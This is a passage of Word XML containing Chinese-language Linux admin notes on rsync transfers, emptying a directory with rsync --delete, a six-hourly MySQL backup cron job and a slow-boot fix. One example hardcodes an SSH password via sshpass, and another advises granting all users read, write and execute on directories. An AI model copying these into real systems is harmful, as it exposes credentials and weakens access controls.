      <w:r>
        <w:t>Local to Remote: rsync [OPTION]... [SRC]... [USER@]HOST:DEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4273832E" w14:textId="788287DA" w:rsidR="001C4A20" w:rsidRDefault="001C4A20" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定端口指定用户名密码：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05845">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rsync -avz -e "sshpass -p 'blingsec@123.com' ssh -p 50022" blingsec@192.168.3.203:/home/blingsec/db /home/syj/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBFE159" w14:textId="77777777" w:rsidR="001C4A20" w:rsidRDefault="001C4A20" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E5EE44B" w14:textId="647C4DC1" w:rsidR="00D76427" w:rsidRDefault="00D76427" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Remote to Local: rsync [OPTION]... [USER@]HOST:SRC... [DEST]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E618BDF" w14:textId="77777777" w:rsidR="0016081D" w:rsidRDefault="0016081D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4603788A" w14:textId="2F12B388" w:rsidR="001D18E3" w:rsidRDefault="001D18E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA5A6BF" w14:textId="4A5CCA94" w:rsidR="0016081D" w:rsidRDefault="001D18E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001D18E3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rsync -azP -e 'ssh -p 50022' syj@192.168.3.199:/srv/ftp/ /srv/ftp/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1696A155" w14:textId="77777777" w:rsidR="0016081D" w:rsidRDefault="0016081D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B589F60" w14:textId="2AFDAFD9" w:rsidR="0016081D" w:rsidRPr="00D26774" w:rsidRDefault="00A9183F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D26774">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这里存在的问题就是，有很多地方你没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26774">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26774">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>权限，目录没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26774">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26774">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>权限，收到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26774">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>syj</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26774">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用户的权限的限制</w:t>
      </w:r>
      <w:r w:rsidR="00EE5C6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，也受到远程方用户权限的限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03850E0E" w14:textId="77777777" w:rsidR="00A9183F" w:rsidRDefault="00A9183F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1444CCB8" w14:textId="72DA39FB" w:rsidR="00A9183F" w:rsidRPr="00D26774" w:rsidRDefault="009610A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D26774">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>建议从</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26774">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26774">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>99</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26774">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>本地以</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26774">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00D26774">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用户远程传输出去内容。</w:t>
      </w:r>
      <w:r w:rsidR="0095103C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>远程的话，如果你远程的目录没有</w:t>
      </w:r>
      <w:r w:rsidR="0095103C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>exw</w:t>
      </w:r>
      <w:r w:rsidR="0095103C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>权限，需要提前远程过去</w:t>
      </w:r>
      <w:r w:rsidR="0095103C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:r w:rsidR="0095103C" w:rsidRPr="0095103C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> a+r,a+w,a+x DIRPATH</w:t>
      </w:r>
      <w:r w:rsidR="00391AD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7708DD" w14:textId="77777777" w:rsidR="009610A0" w:rsidRDefault="009610A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="047CA866" w14:textId="051F2B0C" w:rsidR="0016081D" w:rsidRDefault="00391AD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>移动完毕后，记得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ftp:ftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回去，让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以进入、访问相应目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310CFE49" w14:textId="77777777" w:rsidR="007A7627" w:rsidRDefault="007A7627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15974091" w14:textId="48961C59" w:rsidR="007A7627" w:rsidRDefault="007A7627" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="274" w:name="_Toc159779734"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>sync</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清空目录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="274"/>
    </w:p>
    <w:p w14:paraId="6FE16BBC" w14:textId="77777777" w:rsidR="007A7627" w:rsidRDefault="007A7627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C0CF9F" w14:textId="3A7AF5F8" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个空的临时目录：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E9B718" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F21CD44" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC705C" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FF5E47" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1B64">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mkdir /path/to/empty_dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D09026" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A36F125" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rsync </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将空目录同步到要清空的目录：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CE157F" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751B890B" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>css</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C655804" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16EE7662" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1B64">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rsync -a --delete /path/to/empty_dir/ /path/to/target_dir/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55405AC7" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20E76195" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请确保在源目录和目标目录的路径后面都添加了斜杠</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这样，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">rsync </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会将目录内容（在这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>种情况下为空）同步到目标目录，而不是将整个目录复制到目标目录中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67974A13" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3201968A" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--delete </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项告诉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rsync </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除目标目录中的所有文件和子目录，这样目标目录就会变为空。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F90B98" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A3E896E" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除临时空目录：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2B182E" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4B77AC" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763AEEF4" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEDEF04" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1B64">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rmdir /path/to/empty_dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF74757" w14:textId="77777777" w:rsidR="001F5EB3" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42876FB2" w14:textId="1878BB1C" w:rsidR="007A7627" w:rsidRDefault="001F5EB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样，目标目录中的所有文件和子目录都将被删除，目录本身将保持为空。请注意，这个方法并不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rsync </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的主要用途，所以在执行此操作之前，请确保仔细检查命令以避免意外删除文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C43013" w14:textId="77777777" w:rsidR="007A7627" w:rsidRDefault="007A7627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268C48AF" w14:textId="16E3A0AD" w:rsidR="0044054C" w:rsidRDefault="0044054C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="275" w:name="_Toc159779735"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个小时备份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="275"/>
    </w:p>
    <w:p w14:paraId="358640E0" w14:textId="5ECDFE02" w:rsidR="0044054C" w:rsidRDefault="00D56A2E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我害怕由于我自己的操作，不小心删除了数据库中的数据，</w:t>
      </w:r>
      <w:r w:rsidR="00CC4AC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以此处定了每</w:t>
      </w:r>
      <w:r w:rsidR="00CC4AC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00CC4AC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个小时备份一次数据。由于</w:t>
      </w:r>
      <w:r w:rsidR="00CC4AC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rsync</w:t>
      </w:r>
      <w:r w:rsidR="00CC4AC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的特性，每</w:t>
      </w:r>
      <w:r w:rsidR="00CC4AC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00CC4AC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个小时他只会对文件存在变动的部分进行复制，而不会浪费冗余文件复制的资源，所以就这么做。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1DD573" w14:textId="77777777" w:rsidR="0044054C" w:rsidRDefault="0044054C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32390DEB" w14:textId="77777777" w:rsidR="0044054C" w:rsidRDefault="0044054C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个小时对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库进行备份</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3157D337" w14:textId="51D7AEEF" w:rsidR="0044054C" w:rsidRDefault="0044054C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>0 */6 * * * /usr/bin/rsync -avh /home/blingsec/db /root/db &gt; /home/syj/crontab-sh/mysql.bak.log 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1F4E95" w14:textId="77777777" w:rsidR="0044054C" w:rsidRPr="0044054C" w:rsidRDefault="0044054C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508A38E8" w14:textId="77777777" w:rsidR="0044054C" w:rsidRDefault="0044054C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DDB47C9" w14:textId="77777777" w:rsidR="007A7627" w:rsidRPr="00960FFE" w:rsidRDefault="007A7627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E81DA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="276" w:name="_Toc159779736"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运维问题积累</w:t>
      </w:r>
      <w:bookmarkEnd w:id="276"/>
    </w:p>
    <w:p w14:paraId="01C56609" w14:textId="62C30FD7" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70438D42" w14:textId="0F0B8695" w:rsidR="00FE1C0A" w:rsidRDefault="00FE1C0A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="277" w:name="_Toc159779737"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开机启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1m</w:t>
      </w:r>
      <w:r>
        <w:t>30s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>慢</w:t>
      </w:r>
      <w:bookmarkEnd w:id="277"/>
    </w:p>
    <w:p w14:paraId="1CA84B0F" w14:textId="58D37B62" w:rsidR="00FE1C0A" w:rsidRPr="00FE1C0A" w:rsidRDefault="00FE1C0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1C0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE1C0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开机卡在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE1C0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> A start job is runing for wait for Network to be configured (1min 23s / no limit)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE1C0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1482D3" w14:textId="20EB8AB5" w:rsidR="00FE1C0A" w:rsidRDefault="00FE1C0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0735021F" w14:textId="6FFBF355" w:rsidR="00FE1C0A" w:rsidRDefault="000817B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="000817B9">
        <w:t>https://blog.csdn.net/weixin_42300866/article/details/123712774</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3906AB9D" w14:textId="4FF27AA1" w:rsidR="00663A46" w:rsidRDefault="00663A46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DFAD42D" w14:textId="77777777" w:rsidR="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>root@k8s-master1:~# cd /etc/systemd/system/network-online.target.wants/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAAA57A" w14:textId="77777777" w:rsidR="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>root@k8s-master1:/etc/systemd/system/network-online.target.wants# ll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B1F12" w14:textId="77777777" w:rsidR="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>total 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D03E901" w14:textId="77777777" w:rsidR="00D86824" w:rsidRDefault="00D86824" w:rsidP="009222EB">
      <w:pPr>
